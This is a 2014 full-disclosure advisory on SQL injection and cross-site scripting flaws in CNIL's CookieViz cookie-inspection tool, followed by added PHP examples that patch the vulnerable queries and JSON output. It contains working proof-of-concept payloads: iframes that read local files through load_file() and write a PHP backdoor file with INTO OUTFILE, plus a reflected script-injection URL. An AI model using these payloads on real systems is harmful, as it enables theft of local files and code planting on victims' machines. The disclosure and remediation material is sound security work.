Mayk0

CNIL CookieViz Cross Site Scripting / SQL Injection Vulnerabilities

Nov 6th, 2014
Full title: CNIL CookieViz Cross Site Scripting / SQL Injection Vulnerabilities
Date: 2014-11-05
Category: web applications
Platform: php
CVE: CVE-2014-8351, CVE-2014-8352

================================

Description:
CNIL CookieViz suffers from cross site scripting and remote SQL injection vulnerabilities.

================================

# CNIL CookieViz XSS + SQL injection leading to user pwnage
#
# Product link: https://github.com/LaboCNIL/CookieViz
# CVE references CVE-2014-8351, CVE-2014-8352

TL;DR
-----
Since October 2014, the French National Commission on Informatics and
Liberty "CNIL" has been carrying out checks on "tracing cookies" (ads,
web audience measurement etc.) set by French websites:
http://www.cnil.fr/linstitution/actualite/article/article/cookies-des-controles-a-partir-doctobre/
In order for private individuals to know which cookies are set while
browsing teh interwebz, CNIL "experts" generously released the "CookieViz"
tool, which is compatible with most modern operating systems (Windows,
Linux, OS X):
- http://www.cnil.fr/vos-droits/vos-traces/les-cookies/telechargez-cookieviz/
- https://github.com/LaboCNIL/CookieViz

Anyone can thus use this tool to check for potential tracing infringements.
While this intention is definitely laudable, the produced code is
dreadful and riddled with ridiculous security vulnerabilities: XSS, SQL
injections and security misconfigurations which can lead to leakage of
the user's files and potentially to a compromise by pushing malicious
files onto his system.

For an organisation fighting for citizens' data privacy... exposing them to
security troubles is the height of irony.


PoC
---
CookieViz is based on 2 components:
- A cookie harvester, which is basically a grep on tshark with http
  filters on;
- A cookie visualizer, which is a more or less fancy HTML GUI relying on
  d3js.

The 2 components are:
- Packaged in a standalone WAMP environment for Windows: both components
  notably use the root MySQL account with all privileges (hello FILE),
  PHP magic quotes are off and so on...
- Unpackaged for Linux and Mac OS environments: you have to integrate
  them into your own (L|M)AMP. In this case, the impact of the vulns
  depends only on you and your setup.

The following PoC only focuses on Windows.
The scenario is:
0. You install the standalone package;
1. You visit a website in order to check for its cookies. This website
   includes malicious resources, e.g. in an iframe, which can for instance:
   1.a) read arbitrary local files;
   1.b) write arbitrary content to non-existing files: this would directly
        give arbitrary code execution on the victim's system, except that
        interesting PHP functions like shell_exec(), exec(), passthru()
        etc. are explicitly disabled in the php.ini;
2. You get pwned as the malicious resources are locally executed.

  73.  
> SQLi injection: CVE-2014-8351
-----------------
On your malicious website, create an HTML file containing one of these
payloads:

1.a)
<!DOCTYPE html>
<html>
<body>
<p>Reading arbitrary local file - C:\CookieViz\conf\php.ini :</p>
<iframe src="http://localhost:81/cookie_viz/info.php?domain=*' union all select @@version,2,3,4,5,6,1,load_file('C:\\CookieViz\\conf\\php.ini'),9 -- /**">
</iframe>
</body>
</html>


1.b) Inb4: '<?PHP echo "Im pwned " ?>' is converted to a string with the
MySQL CHAR() function
<!DOCTYPE html>
<html>
<body>
<p>Inserting arbitrary PHP code in C:\CookieViz\www\backdoor.php :</p>
<iframe src="http://localhost:81/cookie_viz/info.php?domain=*' union all select @@version,2,3,4,5,6,7,CHAR(39, 60, 63, 80, 72, 80, 32, 101, 99, 104, 111, 32, 34, 73, 109, 32, 112, 119, 110, 101, 100, 32, 34, 32, 63, 62, 39),9 INTO outfile 'C:\\CookieViz\\www\\backdoor.php' -- /**">
</iframe>
</body>
</html>

2) Visit your HTML page with the standalone package browser.
3) Profit.


> XSS: CVE-2014-8352
-----
http://localhost/cookieviz/json.php?max_date="><script>alert(1)</script>


Vuln details
-------
> SQLi injections:
-----------------
info.php, line 21:

if(isset($_GET["domain"]))
{
    $domain = $_GET["domain"];
}
[...]
$query="SELECT * FROM url_referer WHERE referer_domains='".$domain."'GROUP BY url_domains, referer_domains";
$result = mysql_query($query) or die ("Echec de la requête : ".$query."
". mysql_error());
while ($line = mysql_fetch_assoc($result))
{
    echo "<tr>";
    if ($line["is_cookie"] == 1)
    {
        echo "<td>".$line["referer_domains"];
        echo "<td>".$line["url_domains"];
        echo "<td>".$line["cookie"];
    }
    echo "</tr>";
}

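For comparison, here is the info.php query above rewritten the way a reviewer would ask for it. This is an added example, not CookieViz code: the user-supplied domain is bound as a prepared-statement parameter instead of being concatenated, and every database value is HTML-escaped before being echoed (cookie values are harvested off the wire, so the unescaped echo in the original is a stored-XSS path as well). The example runs against an in-memory SQLite database through PDO so it works offline; the table and column names are taken from the snippet, while the schema types, the sample rows and the function names (open_demo_db, fetch_cookie_rows, render_rows) are constructed for this demo.

```php
<?php
// Added example, not CookieViz code. Uses PDO over in-memory SQLite so it runs
// offline; the real tool talks to MySQL, but the binding works the same way.

function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Column names come from the advisory's snippet; types are assumed.
    $db->exec('CREATE TABLE url_referer (
        referer_domains TEXT, url_domains TEXT, cookie TEXT, is_cookie INTEGER)');
    $stmt = $db->prepare('INSERT INTO url_referer VALUES (?, ?, ?, ?)');
    // Constructed sample rows for the demo.
    $stmt->execute(['example.org', 'ads.example.net', 'uid=42', 1]);
    $stmt->execute(['example.org', 'cdn.example.net', '', 0]);
    return $db;
}

// Hardened replacement for the vulnerable query: $domain is bound as data, so
// quotes, UNION and comment sequences never reach the SQL parser as syntax.
function fetch_cookie_rows(PDO $db, string $domain): array
{
    $stmt = $db->prepare(
        'SELECT referer_domains, url_domains, cookie, is_cookie FROM url_referer
         WHERE referer_domains = :domain
         GROUP BY url_domains, referer_domains');
    $stmt->execute([':domain' => $domain]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Output side: escape every value before it lands in the HTML table.
function render_rows(array $rows): string
{
    $html = '';
    foreach ($rows as $line) {
        $html .= '<tr>';
        if ((int) $line['is_cookie'] === 1) {
            foreach (['referer_domains', 'url_domains', 'cookie'] as $col) {
                $html .= '<td>'
                    . htmlspecialchars((string) $line[$col], ENT_QUOTES | ENT_HTML5, 'UTF-8')
                    . '</td>';
            }
        }
        $html .= '</tr>';
    }
    return $html;
}

$db = open_demo_db();

// Legitimate lookup: the cookie row for example.org is rendered.
echo render_rows(fetch_cookie_rows($db, 'example.org')), PHP_EOL;

// The advisory's 1.a) injection string, now bound as a parameter: no row has
// that literal domain, so the result is empty instead of a UNION over load_file().
$attack = <<<'PAYLOAD'
*' union all select @@version,2,3,4,5,6,1,load_file('C:\\CookieViz\\conf\\php.ini'),9 -- /**
PAYLOAD;
echo render_rows(fetch_cookie_rows($db, $attack)), PHP_EOL;
```

Run it with `php` on the command line; the first echo prints one populated row, the second prints nothing because the payload is treated as a domain name that matches no row. Note that parameter binding fixes the injection but not the second half of the problem described in the PoC: the Windows package runs as MySQL root with the FILE privilege, which is what makes load_file() and INTO OUTFILE available to any injection. That needs a separate fix on the database side (a least-privileged account for the web app, and restricting file operations through MySQL's secure_file_priv setting).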

> XSS:
-----
json.php, line 253:

print '{"inf_nodes":'.$write_nodes.',"inf_links":'.$write_links.',"max_date":"'.$max_date.'","cpt":'.$cpt.'}';

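The json.php line above reflects max_date straight into hand-concatenated JSON, which is why a quote and a script tag in the parameter end up in the page. The following is an added example, not CookieViz code, showing the two defensive layers a fix would use: max_date is validated as a date before it is used, and the response is built with json_encode() over a PHP array so every value is serialised as a JSON string literal. The validate_max_date and build_json helpers and the sample node/link arrays are constructed for this demo; the key names mirror the advisory's $write_nodes, $write_links, $max_date and $cpt.

```php
<?php
// Added example, not CookieViz code.

// Declare the response type up front so browsers do not sniff it as HTML.
// header() is skipped on the CLI, where this demo is run.
if (PHP_SAPI !== 'cli') {
    header('Content-Type: application/json; charset=utf-8');
}

// max_date is a date; reject anything that is not a real YYYY-MM-DD value.
function validate_max_date(string $raw): ?string
{
    if (preg_match('/^\d{4}-\d{2}-\d{2}$/', $raw) !== 1) {
        return null;
    }
    // Round-trip through DateTime to reject impossible dates such as 2014-13-45.
    $d = DateTime::createFromFormat('!Y-m-d', $raw);
    return ($d !== false && $d->format('Y-m-d') === $raw) ? $raw : null;
}

// Build the response with json_encode() instead of string concatenation.
// The JSON_HEX_* flags additionally encode <, >, &, ' and " as \uXXXX so the
// output stays inert even if a browser renders it as HTML.
function build_json(array $nodes, array $links, string $max_date, int $cpt): string
{
    return json_encode([
        'inf_nodes' => $nodes,
        'inf_links' => $links,
        'max_date'  => $max_date,
        'cpt'       => $cpt,
    ], JSON_HEX_TAG | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_HEX_APOS | JSON_THROW_ON_ERROR);
}

// Constructed sample graph data standing in for what json.php computes.
$nodes = [['name' => 'example.org'], ['name' => 'ads.example.net']];
$links = [['source' => 0, 'target' => 1]];
$cpt   = 1;

// A well-formed request value passes validation unchanged.
var_dump(validate_max_date('2014-11-05'));

// The advisory's XSS string fails validation and never reaches the output.
$xss = '"><script>alert(1)</script>';
var_dump(validate_max_date($xss));

// Defence in depth: even if the raw string reached the encoder, it would be
// emitted as an escaped JSON string rather than as markup.
echo build_json($nodes, $links, $xss, $cpt), PHP_EOL;
```

Running this with `php` shows the valid date returned as-is, NULL for the script payload, and a final JSON document in which the angle brackets and quotes of the payload appear as \u escapes inside the "max_date" string. In the real json.php the validated value (or an error response when validation fails) would be what gets passed to build_json(); the last call here only demonstrates that the encoder alone already neutralises the reflected markup.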
Solution
--------
- Slutshame CNIL
- Wait for patches


Timeline
--------
Oct 16, 2014: Learning that CNIL released a tool. Visiting the
project page and laughing a bit
Oct 17, 2014: Requesting CVE IDs, just for trolling purposes
Nov 03, 2014: Going full disclosure, still for trolling purposes